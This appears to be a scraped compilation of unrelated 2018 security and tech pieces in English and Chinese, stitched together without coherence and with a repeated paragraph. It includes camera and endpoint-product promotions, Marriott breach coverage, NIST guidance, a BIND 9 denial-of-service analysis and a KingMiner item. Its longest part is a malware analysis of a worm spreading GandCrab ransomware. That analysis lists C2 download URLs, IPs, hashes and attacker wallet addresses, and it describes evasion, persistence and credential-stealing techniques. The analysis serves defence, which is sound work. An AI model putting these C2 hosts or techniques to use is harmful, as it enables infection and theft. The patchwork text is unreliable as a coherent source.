Arlo is looking to change the game when it comes to security cameras. The company has just announced a brand new camera called Arlo Ultra that manages to function without wires, which is quite rare for security cameras.

As impressive as the lack of wires is, it’s been done before. What makes the Arlo Ultra stand out is the fact that it captures in 4K resolution with HDR, which is extremely impressive for a security camera.

Make sure you have a 4K display to look at your captured footage on , though!

As mentioned from the outset, this is a wire-free security camera that can capture in gorgeous 4K HDR, which is quite rare in the world of security cameras. Previously, the company offered the Arlo Pro 2, which featured the wire-free element of the Ultra, but it was only able to capture footage in 1080p.

The Arlo Ultra also featurescolor night vision and advanced image processing, which should make you forget that you’re even looking at footage captured through a security camera.

For audio, the Ultra featuresdual-microphones, which means it will be able to record clear, crisp two-way audio with advanced noise cancelation.

Because of the wire-free design, the camera does need to be recharged between uses. However, if you’re planning to mount it somewhere semi-permanently, you can simply plug it in and leave it.

According toPat Collins, senior vice president of Arlo products, ““Our new flagship wire-free camera represents major advancements in video, audio, software, AI, and computer vision capabilities.”

Here are some other notable features of the Arlo Ultra:

Arlo announced that its latest camera will be available in the first quarter of 2019, so you won’t have to wait too long to get your hands on one.

As of this writing, the company hasn’t revealed pricing information for a single camera. However, Best Buy has a two-camera setup available for $599 for pre-order .

If you can’t wait, check out our list of the best wireless security cameras 4 Completely Wireless Security Cameras for Your Home 4 Completely Wireless Security Cameras for Your Home Frustrated by home security systems that are limited by outlet placement? These four completely wireless security cameras might just convince you to cut the cord completely! Read More that you can get right now.

Explore more about:Home Security, .

Why it matters:The biggest selling point here is without a doubt the 4K resolution. 1080p is considered the gold standard for today’s security solutions but in practice, I’ve found it has some pretty serious limitations. I’m also concerned about the bandwidth requirements for 4K as my 1080p doorbell camera struggles with connectivity and quality way more often than I’d like.

Arlo, the home security camera brand from Netgear, has announced its first 4K Ultra HD recording solution. The aptly named Arlo Ultra is a wire-free security system boasting high dynamic range (HDR), color night vision and advanced image processing in a package that looks no different than your ordinary security camera.

Arlo’s new camera also offers a 180-degree diagonal field of view, an integrated LED spotlight and dual microphones for two-way audio.

Bundled with the Arlo Ultra is the Arlo SmartHub. This device connects to your router to provide extended Wi-Fi range to Arlo cameras, manage traffic to and from the camera to the user’s cloud account and provide “a more secure dedicated IOT network for the devices connected to the Arlo SmartHub.”

The SmartHub features a microSD card slot for local storage of recorded video.

Arlo Ultra is set to launch in the first quarter of 2019 for $399.99 and includes a one-year Arlo Smart Premier subscription (a $119.88 value).

Carbon Black Endpoint Security is an effective and user-friendly endpoint solution for user devices such as PCs and laptops. It features malware protection that keeps threats at bay while protecting your network and computer systems from hackers and viruses.

Carbon Black seeks to transform cybersecurity through the use of big data and analytics, combined with cloud technologies. They have recognized that mobile devices and cloud technologies have moved the goal posts as far as endpoint security is concerned, prompting them to develop a proactive approach to threats.

Carbon Black Endpoint Security uses online hashes to detect malware and virus incidents in your local environment, which means that most organizations that implement it are stunned to find multiple incidents of previously undetected malware. This is a great way for your team to learn how to adapt to Carbon Black Endpoint Security while also developing new incident response routines.

Carbon Black Endpoint protection offers solutions to all of your organization’s security needs and uses a series of individual services that run locally on your private network as well as remotely in the cloud.

These services include:

The individual components that make up Carbon Black’s protection products enable it to defend against both emerging and known threats, giving endpoint users the confidence and assurance that their IT systems are protected and safe at all times. We will look at each individual component and explore what each one does.

Carbon Black understands that today’s cybercriminals are at the forefront of innovation when it comes to developing malware and viruses, which means that they can rapidly develop and deploy new threats faster than ever before. Traditional antivirus and endpoint solutions are simply unable to keep up with the pace, and inevitably end up in a reactive stance against malware, viruses and hackers.

Carbon Black is able to stay one step ahead of this disturbing trend by using an advanced predictive model that is based in the cloud, which uncovers malicious behavior before it manifests itself as a surprise attack or infection across your network. It is able to stop malware and ransomware and can even help to stop non-malware-based attacks. It prevents attacks without you needing to do a thing, automatically stopping threats as they occur whether the system is online or offline.

Carbon Black’s Predictive Security Cloud is able to capture and store a wide range of system metrics in an unfiltered form from each and every endpoint that is plugged into the system, which gives it a massive data set to work with. When combined, this data can help paint a picture of what is happening on many different levels, from local or individual systems to a macro overview of a network or region.

This helps Carbon Black to identify emerging threats that haven’t yet broken the surface, where traditional anti-malware and antivirus software usually fails. This is because it is able to store and record the complete records of each endpoint, even if it goes offline. The system is able to analyze all of the endpoint activity against signatures of known behavior and reputation, which are compared to over 110 known behaviors that are commonly used by attackers.

Carbon Black Endpoint Security is equipped with an industry-leading detection and response system that allows it to reveal suspicious and threatening behavior in real time. This allows you and your team to decide on the urgency and speediness of your threat response, and how long you have in order to contain the threat as quickly as possible. Once the threat has been identified, you and your team can respond accordingly.

If you compare Carbon Black: Endpoint Security to traditional products you will find that antivirus software has a few distinct disadvantages. Carbon Black automates tasks such as deployment, updating and threat detection. This makes it a simple solution to deploy to your environment, regardless of size. It scales well across large networks and uses minimal system resources on endpoint computers. Users can expect 1% CPU and hard disk usage, so performance impact is practically unnoticeable.

The open API lets Carbon Black fit in with your environment, allowing customization and integration with your systems. Real-time sensors make it easy for your IT team to detect and manage threats with almost no effort, which is excellent news for system admins.

SecurityIQ is an on-demand training program that has been developed by InfoSec Institute to allow organizations to upskill and train employees to handle the situation whenever an incident is triggered. The idea of an on-demand alert for training is important if you want to turn a disaster situation into a teachable moment for the rest of the organization. The system uses micro-training as a way to instill proper real-world training with actual threat scenarios.

The REST API used as the integration protocol by Security IQ is implemented within Carbon Black and lets the two systems work together. If real-world, onsite training is a concern for your company at present, then this is the right solution for you and your organization. You can learn more about Security IQ here.

Carbon Black offers protection that is highly-advanced and cloud-based, with real-time detection that will give your team enough time to respond effectively. Thanks to the large volumes of data that Carbon Black analyzes and sorts through, you will be in a much better position than if you were to use an outdated antivirus solution on its own.

Carbon Black is able to integrate with SecurityIQ so that your users come away with new knowledge about how they can keep their systems safe from malware, viruses and attackers. By combining SecurityIQ with Carbon Black, users can not only be protected, but educated in the event that something slips through the net. IT security is like health care: always critical, but prevention is better than cure.

新浪 美股讯 北京时间12月1日， 万豪国际 集团披露了一起涉及其喜达屋子公司数据库的黑客攻击事件，凸显出并购交易中隐藏的网络安全风险。

万豪在2016年以136亿美元收购了喜达屋。该公司11月30日宣布，自2014年以来，它在喜达屋的客户预订数据库中发现了多达5亿名客人信息被未经授权访问。

即便是对目标进行彻底审查的公司，也无法完全避免它们正在承受风险的可能性。

目标公司系统中的数据泄露可能会给收购公司的声誉带来无形的损害成本，同时也会给发现和补救黑客行为带来实际代价。而那些没有充分意识到自己在购买什么东西的公司，可能会因为数据泄露而面临诉讼，这可能需要数年的时间。

“这是一次大规模的数据泄露，减轻损失的成本也将是巨大的，”Wiggin and Dana LLP律师事务所合伙人、司法部前联邦检察官戴维-霍尔（David L． Hall）表示。“万豪可能会面临来自受影响客户的诉讼，包括集体诉讼。”

万豪酒店11月19日确定，被盗数据包含喜达屋预订数据库的信息。该公司说，在3.27亿名宾客中，包括姓名、邮寄地址、电话号码、电子邮件地址和护照号码等信息。一些客人的加密信用卡信息可能被泄露。

喜达屋在2015年警告客户，包含信用卡和借记卡数据的系统存在安全漏洞。这一声明就在万豪与喜达屋达成协议的几天后。

企业越来越明白，在交易过程中需要进行强有力的尽职调查。过去几年，环境风险评价已经成为一个关键问题，它可能改变交易进程，改变收购价格，或彻底摧毁交易。企业及其律师将严格审查视为谈判的重要组成部分。

隐私和网络安全问题“终于被交易律师认可，可能对交易产生巨大影响，”霍顿安德鲁斯库尔斯律师事务所全球隐私和网络安全小组合伙人兼主席丽莎-索托（Lisa J． Sotto）表示。

买家可以查看目标公司过去的入侵或网络安全事件，评估该公司的数据资产，并进行渗透测试和漏洞评估。

Verizon收购雅虎公司就是一个例子，说明公司可以为违规行为付出代价。雅虎披露了与Verizon合并的计划中出现的大规模数据泄露，导致收购价下降3.5亿美元。

企业越来越多地在并购文件中加入明确的网络安全条款。

万豪和喜达屋的合并交易是在雅虎遭黑客攻击的消息被披露之前签署的，其中没有明确的网络安全条款。自从Verizon根据雅虎的数据泄露事件重新谈判收购雅虎的交易以来，更多的并购方都加入了安全条款，收购方现在在交易结束前对目标进行更广泛的系统评估。

What Executives Need to Know about New NIST Guidelines for TLS Management

kdobieski

Fri, 11/30/2018 16:30

There are three major risks you face if you don’t effectively manage TLS certificates across your enterprise:

Unlike most security technologies that are deployed and managed by central InfoSec teams, TLS is individually implemented and managed on each system where it is used; and each system requires a unique cryptographic credential, called a TLS certificate. This means every department that deploys/manages systems is deploying and managing TLS certificates themselves. Many organizations have a central team responsible for certificates (typically called the PKI team) but these teams are typically understaffed and, more importantly, don’t have the right processes and technology in place to effectively support all of the teams using TLS certificates to ensure that security and operational risks are mitigated.

Even if you’ve already invested in establishing a formal TLS certificate management program and feel like you’re doing pretty well, the NIST guidance can still help you. Because the use of TLS to secure communications is rapidly increasing to encompass all major business applications in organizations, this guidance will help you ensure your TLS certificates management program will effectively scale with the expanded use of TLS to address outages and security threats.

To make sure the guidance is clear and comprehensive, NIST has released it for public review and feedback. Considering the central role TLS plays in your organization’s security, it’s critical that the guidance provide your organization everything needed to effectively manage TLS certificates and contain risk. NIST needs your feedback on whether it meets that objective.

I recommend executives read 1800-16 Volume A . It provides a high-level view of TLS certificate risks and outlines an action plan for addressing them. Volume B provides more detailed background on TLS, TLS certificates, risks, and effective strategies for effectively managing TLS certificates across your enterprise. You should ask your team (security directors, managers, and architects) to read that volume and come back to you with a plan for how your organization will implement an effective TLS certificate management program.

As a result of poor TLS certificate management, many organizations are experiencing outages, finger pointing, and undetected pivoting by attackers because nearly all traffic is encrypted with TLS and InfoSec groups can’t see malicious traffic between systems. This guidance from NIST is designed to help you eliminate these issues. Read it, start implementing, and provide your feedback on anything you feel is missing.

In addition to the new SP 1800-16 guidance, NIST has been busy updating their other key and certificate management guidance and happen to have recently released a second draft of 800-57 Part 2 (Recommendation for Key Management, Part 2: Best Practices for Key Management Organizations) for public review . I’ll provide background on that in a separate post.

Paul Turner

If you’re an IT or InfoSec executive in an enterprise that relies on secure communications to protect its data and operation, you need to read NIST Special Publication 1800-16, which provides essential guidance for managing TLS (Transport Layer Security) certificates and was recently published for public review.

If you’re wondering, “What is he talking about? We use TLS but what’s the big deal?”, the NIST guidance is for you.

Whatever business you’re in, your organization relies on TLS and TLS certificates to secure nearly ALL your communications and authenticate nearly ALL servers inside and outside your network boundaries. If you don’t have a formal TLS certificate management program in place, your organization is at risk of outages and breaches.

See the analyst findings.

Explore now.

Recent Articles By Author

作者：k0shl 转载请注明出处：https://whereisk0shl.top

2018年的最后一个月，一年又要过去了....

BIND 9是一款著名的DNS服务端，其中，buffer.c存在一处断言导致的拒绝服务漏洞，在CNVD特地发公告表明BIND 9的拒绝服务漏洞属于高危漏洞，这个漏洞是由于buffer.c中会有一个对于长度的判断，如果我们构造特殊的数据包，加上/0，会导致长度判断不通过，导致BIND 9会进入assert断言处理，从而引发拒绝服务漏洞。下面对此漏洞进行详细分析。

PoC:

BIND 9是一款著名的DNS服务端，其中，buffer.c存在一处断言导致的拒绝服务漏洞，在CNVD特地发公告表明BIND 9的拒绝服务漏洞属于高危漏洞，这个漏洞是由于buffer.c中会有一个对于长度的判断，如果我们构造特殊的数据包，加上/0，会导致长度判断不通过，导致BIND 9会进入assert断言处理，从而引发拒绝服务漏洞。下面对此漏洞进行详细分析。

首先部署BIND 9服务，这时候linux会开启53端口，gdb附加，发送畸形数据包。

可以看到Payload在Additional records字段中，数据包发送后，gdb会命中断点。

这时候接收到了一个SIGABRT信号，在调用abort后会到达这个位置，从而中止DNS服务，通过bt的方法回溯一下堆栈调用情况。

可以看到，在#4位置调用了isc_assertion_failed，随后执行了abort然后vsyscall中止服务，#4位置的assert应该是一处断言错误。来看一下buffer.c的源码部分。

在源码中关于isc__buffer_add的描述并没有涉及assert部分，但实际上REQUIRE就是一个断言的函数调用，我们通过IDA来观察这个过程。

首先，当服务端接收到数据包的时候，根据additional records字段会先调用dns_name_towire函数处理名称部分。

这里我取了关键的一部分代码，isc_buffer_add(target, gp.length);这个函数调用就是最关键的调用部分。

我们需要跟踪一下gp的值，实际上target指针指向的buffer就是畸形字符串。gp的值是什么呢。gp的值来自于dns_compress_findglobal函数。

gp的值是name的prefix部分，随后进入isc__buffer_add中。

当进入第二个断言错误判断if ( v3 > *(_DWORD *)(a1 + 8) )的时候，我们来看一下这个过程的值，首先a1+8是name结构体中存放name长度的部分。

注意b54c5040+8h的位置部分，存放的是长度，这个长度的获取时根据DNS数据包中字段的值决定的，但是如果这个值碰上/0，则会结束。

所以重新看一下发送的数据包，如果碰上/0，则会满足v3，也就是总长度大于字段中存放长度的时候，进入断言判断，DNS服务被中止。

【手机中国新闻】11月30日晚间，万豪酒店发布“万豪国际集团公布喜达屋宾客预订数据库安全事件相关信息 ”公告，公告显示自2014年起，存在第三方对喜达屋网络未经授权的访问，最近万豪发现未经授权的第三方已经复制并加密了某些信息，并采取措施试图将这些信息移出。2018年11月19日，万豪成功解密该信息，并确定信息内容为喜达屋宾客预订数据库。

W酒店

万豪表示其数据库包含多达5亿客户的记录。其中约3.27亿客人的信息包括：姓名、地址、电话号码、电子邮件地址、护照号、帐户信息、出生日期、性别、到达和离开信息等信息。此外万豪表示一些记录还包括加密的支付卡信息，但它不能排除加密密钥也被盗的可能性。

图片来自万豪

万豪国际集团于2016年收购了喜达屋，创建了全球最大的连锁酒店，目前拥有超过5800家酒店。喜达屋的酒店品牌包括W酒店、喜来登、艾美酒店和福朋喜来登酒店等众多品牌，万豪品牌酒店在不同的网络上使用单独的预订系统。此事一出，万豪国际周五开盘跌逾5%，报115.34美元，总市值407.56亿美元。

近日，360终端安全实验室监控到GandCrab勒索病毒有了新动向，和以往相比本次GandCrab传播量有了明显的波动，我们分析了背后原因，发现此次波动是由一种近年较常见的蠕虫病毒引起的，该蠕虫病毒主要通过U盘和压缩文件传播，一直活跃在包括局域网在内的众多终端上。该蠕虫病毒构成的僵尸网络，过去主要传播远控、窃密、挖矿等木马病毒，而现在开始投递GandCrab勒索病毒。由于该病毒感染主机众多，影响较广，因而造成了这次GandCrab的传播波动。在此特提醒大家注意保护好您的数据，当心被勒索病毒袭击从而遭受不可挽回的损失。

我们对该蠕虫病毒的最新变种进行了深入分析。病毒的母体和以往相比没有太大变化，其主要特别之处在于其投递的病毒种类有了新变化，除了新增投递GandCrab勒索病毒外，还发现该病毒的初次投放方式，也即病毒制作者是怎么投放病毒的。一般病毒的初次投放方式包括挂马、捆绑下载、邮件附件、租用僵尸网络、漏洞利用等，而这次该病毒使用了邮件附件作为其初次投放传播的手段之一。

下面首先就其主要技术特点概括如下：

探测虚拟机/沙箱运行环境

病毒母体是一个DownLoader，运行时通过遍历进程以及检查加载的模块来探测运行环境是否是虚拟机或沙箱环境，其中特别针对python进程进行了检查（沙箱常用），还通过检查加载的DLL模块来检测sandboxie或sysanalyzer：

病毒会将自身拷贝至windows\自建目录\winsvcs32.exe，并创建注册表开机启动项实现持久化运行：

拷贝并重命名为winsvc32.exe

创建注册表开机启动项

删除自身的Zone.Identifier NTFS Stream避免运行时出现风险提示

防火墙以及Windows Defender相关设置

针对网络磁盘以及可移动磁盘

在U盘根目录创建”_”目录以及将自身拷贝并重命名为DeviceManager.exe

创建指向病毒母体的lnk文件

Lnk文件内容

被感染后的U盘以及AutoRun.inf截图

判断%appdata%\winsvcs.txt是否存在，不存在则创建该文件，该文件起到一个开关作用，用来判断是否对压缩文件进行感染：

将自身拷贝至%TEMP%目录，并重命名为“Windows Archive Manager.exe”：

遍历本地磁盘中的压缩文件，将病毒本体添加到压缩文件，受感染的压缩类型包括zip、rar、7z、tar：

这部分代码功能还不太完善，经过测试，压缩格式只支持zip、rar，7z和tar格式的支持有Bug，感染后会破坏原有格式：

遍历磁盘文件，判断EXE文件所在路径是否包含如下FTP/WEB服务器目录：

如果满足条件，则把目录下的EXE文件替换成病毒自身文件：

监控剪贴板，如果发现有预期的虚拟货币钱包地址，则进行替换，影响的币种包括：

Btc、eth、ltc、xmr、xrp、zec、dash、doge等。

判断各类货币钱包地址特征

劫持监控剪贴板

母体内嵌了3个C2服务器以及多个混淆的DNS备用地址用于下载传播其他病毒程序（这些DNS暂时无效，但如果前面3个IP被封或失效，可通过启用这些备用DNS来达到切换C2的目的）:

将下列5个文件名与上述ULR链接拼接成完整下载链接：

此处5个恶意链接用来下载传播其他病毒，可谓“五毒俱全”。

下载的多个恶意模块保存在%TEMP%目录下并随机命名，然后删除对应的Zone.Identifier避免运行时出现风险提示：

下载成功后创建进程执行该文件：

此次分析时下载的恶意模块包括：传播模块、2个勒索病毒Downloader、窃密模块、挖矿模块（具体推送某类恶意程序随时间以及C2服务器而定）

挖矿模块与病毒母体采用了类似代码混淆方式，通过内存解密PE并加载执行：

解密配置文件URL地址、以及矿池地址等数据

内存映射NTDLL模块，获取所需API，绕过R3 Hook

通过 http://92.63.197.60/newup.txt 获取挖矿配置相关数据

分析调试时，上述链接已失效：

解析配置数据，包含钱包地址、挖矿端口等配置信息

构造xmrig Config配置文件

根据前面获取到的钱包地址等信息，构造config文件，并进行base64编码保存。

配置文件格式化

Base64解码后的配置文件（由于url失效，无法获取有效钱包地址）

拷贝自身至“ProgramData\GCxcrhlcfj”目录，并创建r.vbs脚本：

通过VBS脚本，在start menu下生成url快捷方式，指向样本自身：

调用wscript执行：

Url快捷方式负责启动挖矿病毒：

挂起方式启动wuapp.exe，其命令行参数为挖矿配置文件：

解密xmrig：

解密xmrig

内存解密出的PE为XMRig 2.8.1版本：

在傀儡进程注入代码:

傀儡进程注入

为了隐蔽自身，样本会实时遍历系统进程检查是否有任务管理器进程存在，如果发现则杀掉挖矿进程：

杀进程代码

该窃密木马为Delphi编写，窃密内容主要包括即时通讯软件聊天记录、浏览器历史记录、WinSCP凭据、Steam账号、虚拟货币钱包、邮箱、屏幕截图等。

样本尝试与C2服务器通讯拉取配置信息（服务器已失效）

相关窃密功能代码结构：

涉及的虚拟货币钱包：

Exodus 、JAXX、MultiBit HD

Monero

Electrum、Electrum-LTC、BitcoinCore

即时通讯软件：

Skype聊天记录等数据

Pidgin、PSI、TeleGram

WinSCP：

Outlook邮箱：

Steam账号相关：

窃取浏览器的历史记录、Cookie等信息（主要针对火狐浏览器）：

火狐浏览器sqlite数据库

由母体下载的2个勒索模块是做了静态免杀的DownLoader，其中一个针对“中国”地区，而另一个针对“越南”以及“中国”地区投放GandCrab勒索病毒。以下是针对“中国”和“越南”地区的下载逻辑相关代码，另一个只针对“中国”类似，此处不重复分析。

地区列表

通过访问 http://92.63.197.48/geo.php 从服务器拉取地区代码列表，然后与”CN”以及”VN”相比较，如果满足这两个地区，则开始下载GandCrab勒索病毒：

比较地区列表

通过C2下载GandCrab母体并执行

下载的GandCrab母体为5.0.4版本，与常见的版本无差异，这里不再做重复分析：

传播模块依旧做了静态免杀处理，以及设置持久化运行，并通过SMTP协议发送携带恶意附件的邮件进行传播，邮件附件为带有恶意JS脚本的压缩包，该恶意脚本最终通过Powershell远程下载并执行本次蠕虫母体DownLoader。

拷贝自身到windows\自建目录下，并重命名为wincfgrmgr32：

通过注册表设置自身为开机启动：

通过aol.com获取邮箱服务器地址并测试连通性

邮箱服务器：mx-aol.mail.gm0.yahoodns.net

通过C2： http://ssofhoseuegsgrfnu.ru/m/get.js 下载恶意js脚本，该JS是一个 DownLoader，保存在TEMP目录随机文件名.jpg

连接服务器下载js文件

经过混淆处理的js代码

接着将js脚本文件压缩成zip格式：

然后将js文件压缩包进行base64编码并保存在\%TEMP%\随机文件名.jpg：

BASE64编码

通过C2（ http://ssofhoseuegsgrfnu.ru/m/xxx.txt ）获取目标邮箱列表：

随机读取该邮箱列表文件，取出邮箱地址，通过SMTP协议发送恶意邮件，其邮件附件会携带前面压缩好的JS脚本的压缩包：

通过SMTP发送恶意邮件

当恶意js脚本在受害者的终端上运行后，js脚本会通过Powershell下载并执行此次蠕虫母体：

进程链信息

c30f72528bb6ab5aab25b33036973b07

48087776645fd9709f09828be7e42f8f

fa940342c3903f54c452a8a2483b1235

24275604649ac0abafe99b981b914fbc

a13d3aef725832752be1605e50b6f7e0

574c8a27fc79939ca1343ccb2722b74f

dfd5be2aeabc2a79c1e64e0b3a6dac73

64e0e23cdec4358354628195ec81a745

92.63.197.60

92.63.197.48

92.63.197.112

92.63.197.60:9090

hxxp:// 92.63.197.48/t.exe

hxxp:// 92.63.197.48/m.exe

hxxp:// 92.63.197.48/p.exe

hxxp:// 92.63.197.48/s.exe

hxxp:// 92.63.197.48/o.exe

hxxp://ssofhoseuegsgrfnu.ru/m/xxx.txt

hxxp://ssofhoseuegsgrfnu.ru/m/get.js

hxxp://92.63.197.48/geo.php

hxxp://92.63.197.60/newup.txt

hxxp://92.63.197.48/index.php

1LdFFaJiM7R5f9WhUEskVCaVokVtHPHxL5

28VcfDWthf987aBo6ddyGuYnMkwtWo6bBe4j7Q87pDYxEEGZzHseUMvFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97qVBups

XfPoiH5ShPQdXC3Kc39XzCaB84eL1w53oA

DPngr3jnAGgKY45vQpt4NmYt3jQCP2smrW

0xa9b717e03cf8f2d792bff807588e50dcea9d0b1c

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQrqWkGbn7jMQVGL3aA

LPuhyFoFggYkXwkkmDbnA19hu1wzuJggHJ

rBkCLqPgHiKt6Hdddnjq27ECehHqCcCHTD

t1aGAy8CBERajaMAKdzddp3WttD5Czji55S

通过分析我们可以看到，本次的蠕虫病毒开始传播勒索病毒GandCrab，而且主要针对的是中国和越南地区，病毒扩散渠道从邮件附件到U盘传播等，覆盖范围比起单纯的某一种传播方式要大不少，同时这背后是否也含有病毒传播者认为国人的安全防范意识不够也未可定，总之本次的传播新动向值得引起国人的高度警惕。

针对本次的病毒技术特点以及结合以往的病毒传播方式，我们给出以下安全建议：

360终端安全实验室由多名经验丰富的恶意代码研究专家组成，重点着力于常见病毒、木马、蠕虫、勒索软件等恶意代码的原理分析和研究，致力为中国政企客户提供快速的恶意代码预警和处置服务，在曾经流行的WannaCry、Petya、Bad Rabbit的恶意代码处置过程中表现优异，受到政企客户的广泛好评。

依托360在互联网为13亿用户提供终端安全防护的经验积累，360终端安全实验室以360天擎新一代终端安全管理系统为依托，为客户提供简单有效的终端安全管理理念、完整的终端解决方案和定制化的安全服务，帮助广大政企客户解决内网安全与管理问题，保障政企终端安全。

360天擎新一代终端安全管理系统是360企业安全集团为解决政企机构终端安全问题而推出的一体化解决方案，是中国政企客户3300万终端的信赖之选。系统以功能一体化、平台一体化、数据一体化为设计理念，以安全防护为核心，以运维管控为重点，以可视化管理为支撑，以可靠服务为保障，能够帮助政企客户构建终端防病毒、入侵防御、安全管理、软件分发、补丁管理、安全U盘、服务器加固、安全准入、非法外联、运维管控、主机审计、移动设备管理、资产发现、身份认证、数据加密、数据防泄露等十六大基础安全能力，帮助政企客户构建终端威胁检测、终端威胁响应、终端威胁鉴定等高级威胁对抗能力，为政企客户提供安全规划、战略分析和安全决策等终端安全治理能力。

根据公司需要调整美国国家标准与技术研究所(NIST)的安全路线图的可操作建议。

美国国家标准与技术研究所网络安全框架( NIST CSF )第一版于2014年发布，旨在帮助各类组织机构加强自身网络安全防御，最近更新到了1.1版。该框架是在奥巴马总统授意下，由来自政府、学术界和各行各业的网络安全专业人士编撰的，特朗普执政后纳入了联邦政府策略范畴。

尽管绝大多数公司企业都认识到了这项改善所有企业网络安全的有益协作的价值，调整和实现该框架确实说起来容易做起来难。NIST CSF 的内容都是公开的，谁都可以查阅，此处不再赘述。这里要讨论的，是可以帮助公司企业根据自身情况现实应用 NIST CSF 的五个步骤。

在开始考虑实现 NIST CSF 之前，公司企业必须先着眼设置自己的目标。过程中遇到的第一个困难通常是在公司范围内就风险承受水平达成一致。在风险的可接受水平由什么组成这个问题上，高级管理层和IT部门之间通常存在断层。

首先，制订一份关于治理的协议草案，明确到底哪种风险水平是可以接受的。在进行到下一步前所有人都必须就此达成共识。另外，规划预算、设立实现优先级和需重点关注的部门也非常重要。

从公司里单个部门或少数几个部门入手意义重大。你可以通过试运行了解到哪些方法有效而哪些是无用功，还可以为后续的广泛部署发掘出正确的工具和最佳操作。试运行项目可以帮你构建更深入的实现，更精准地估测预算。

下一步就是根据公司具体业务需求深挖并调适框架。NIST的框架实现层可以帮你了解自身当前位置和需要到达的地方。分为3个领域：

与 NIST CSF 大部分内容一致，这些也不是一成不变的东西，可以根据公司具体需求来调整。你也可以将之归类为人员、过程和工具，或者往框架中加上两个自己的类别。

上述3个领域都有4个层次。

第1层 不全面的：一般表示一种不协调、不一致的反应式网络安全站位。

第2层 风险指引型：有一些风险感知，但规划还是一致的。

第3层 可重复的：表明覆盖公司范围的CSF标准和一致的策略。

第4层 自适应的：指的是主动式威胁检测与预测。

层次越高，CSF标准的实现越完整，但最好调整这些层次以确保它们与自身目标相贴合。可以用自定义的层次来设置目标得分，但要确保在推进前征得所有利益相关者的同意。最有效的实现是针对具体公司和业务仔细调适过的那种。

前面2步走完，就到了执行细致的风险评估以建立自身当前状态的时候了。最好既有具体职能部门的内部评估，又有针对整个公司的独立评估。寻找能评测你目标领域的开源工具和商业软件并训练员工使用这些工具软件，或者雇佣第三方来做风险评估。比如说，漏洞扫描器、CIS基线测试、网络钓鱼测试、行为分析等等。要确保的是，执行风险评估的人不知道你的目标得分是多少。

CSF实现团队要在呈交给关键利益相关者之前收集并核对最终得分。评估过程的目的是让公司明确了解自身运营(包括使命、职能、形象或声誉)、资产和人员所面临的安全风险。此过程应发现并完整记录漏洞与威胁。

举个例子，下面的图表中，公司标出了3个职能领域：策略、网络和应用。这些可能分布在混合云上，也可能被打散到不同环境以便能在更细致的层次上跟踪――这种情况下需要另外考虑不同部门领导是否需对现场及云端部署负责。

左侧热度图列出了不同CSF功能，可被扩展到任意粒度。采用4级量表，绿色表示一切OK，黄色代表该领域还需要做些工作，红色说明尚需认真分析和校正。这里，出于跨业务部门核心小组比较评估分数的目的，“识别”核心功能被打散了。SME和核心得分是根据企业目标平均的，然后再计算风险缺口。缺口大说明需要加快修复。这张表中，该公司的“防护”和“响应”功能是最弱的。

有了对风险和潜在业务影响的深入认知，便可以开展缺口分析了。要将自身实际得分与目标得分做对比，或许可以考虑采用热度图以直观易懂的方式来呈现结果。任何显著差异都会立即凸显出你应加以关注的领域。

你得找出补足当前得分与目标得分间差距所需要完成的工作，发现一系列可以用来提升得分的动作，并与所有关键利益相关者商讨执行这些动作的优先顺序。具体项目要求、预算考量和人员配备水平可能都会影响到你的计划。

上面4步为你带来了自身防御现状的清晰图景、一套贴合公司情况的目标、全面的缺口分析和一系列修复动作，于是你终于走到了实现 NIST CSF 这一步。将你的第一次实现当做为后续广泛实现记录过程和创建培训资料的机会。

行动计划的实现并不是终结，你还需设置标准来测试其有效性，并不断重新评估该框架以确保符合预期。这里面就应包含持续的迭代和与关键决策者进行验证的过程。为收获最大益处，你需要精炼实现过程，进一步校正 NIST CSF，使其更加贴合你的业务需求。

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

Edward Preston can talk to anyone and everyone about anything. And that is a good thing, because everyone needs protection from the cyber threats that are out there.

After building a global inside sales team at Cylance, he now is bringing enterprise-level protection to the consumer, as Global Director of Consumer Sales.

When Edward talks, it’s worthwhile to listen.

Edward Preston ( @eptrader ) has an eclectic professional background that stretches from the trading floors of Wall Street, to data centers worldwide. Edward started his career in the finance industry, spending over 15 years in commodities and foreign exchange. With a natural talent for motivating, coaching, and mentoring loyal, goal-oriented sales teams, Edward has a track record for building effective sales teams who have solid communication lines with executive management.

About Matt Stephenson

Insecurity Podcast host Matt Stephenson ( @packmatt73 ) leads the Security Technology team at Cylance, which puts him in front of crowds, cameras, and microphones all over the world. He is the regular host of the InSecurity podcast and host of CylanceTV .

Twenty years of work with the world’s largest security, storage, and recovery companies has introduced Stephenson to some of the most fascinating people in the industry. He wants to get those stories told so that others can learn from what has come before.

Cyber security firm Check Point Research has found that the KingMiner cryptojacker targeting cryptocurrency Monero ( XMR ) is “evolving,” according to a company’s blog post published Nov. 30.

KingMiner was purportedly firstly detected in mid-June, subsequently evolving in two improved versions. The malware attacks windows Servers by deploying various evasion methods to skirt its detection. Per Check Point data, several detection engines have registered significantly decreased detection rates, while sensor logs have shown a growing number of KingMiner attacks.

The firm has been monitoring KingMiner activity over the past six months and concluded that the malware has evolved in two new versions. The blog post further explains:

Check Point has determined that KingMiner uses a private mining pool to bypass any detection of their activities, wherein the pool’s (API) is turned off and the wallet is not used in any public mining pools. The attacks are reportedly widely spread around the world.

According to the company’s findings, the malicious software attempts to guess passwords of the servers it attacks. Once a user downloads and executes the Windows Scriptlet file, it reportedly identifies the relevant Central Processing Unit (CPU) architecture of the device and downloads a payload ZIP file based on the detected CPU architecture.

The malware eventually destroys the relevant .exe file process and deletes the files themselves, if older versions of the attack files exist. Check Point also notes that the file is not an actual ZIP file, but rather an XML file, which will circumvent emulation attempts.

As Cointelegraph reported yesterday, Russian internet security company Kaspersky Labs has found that crypto mining malware became increasingly popular among botnets in 2018. During the Q1 2018 cryptojacking “boom,” the share of cryptojacking malware downloaded by botnets, out of total files, hit 4.6 percent ― as compared with 2.9 percent in Q2 2017.

Botnets are reportedly therefore becoming increasingly viewed as a means of spreading crypto mining malware, with cybercriminals increasingly viewing cryptojacking as more favorable than other attack vectors.

AltcoinToday.com

Photo via Shutterstock.

Source: Cointelegraph

loading…

最近的项目在做通过银联接入牛逼哄哄的人行“CNAPS2”系统，不过他们强制要求通信报文采用国家标准SM2进行硬件签名，所以公司折腾了两家硬件签名机设备来玩，这边就做了相关的机器评测，看看相关的指标是否虚标了。

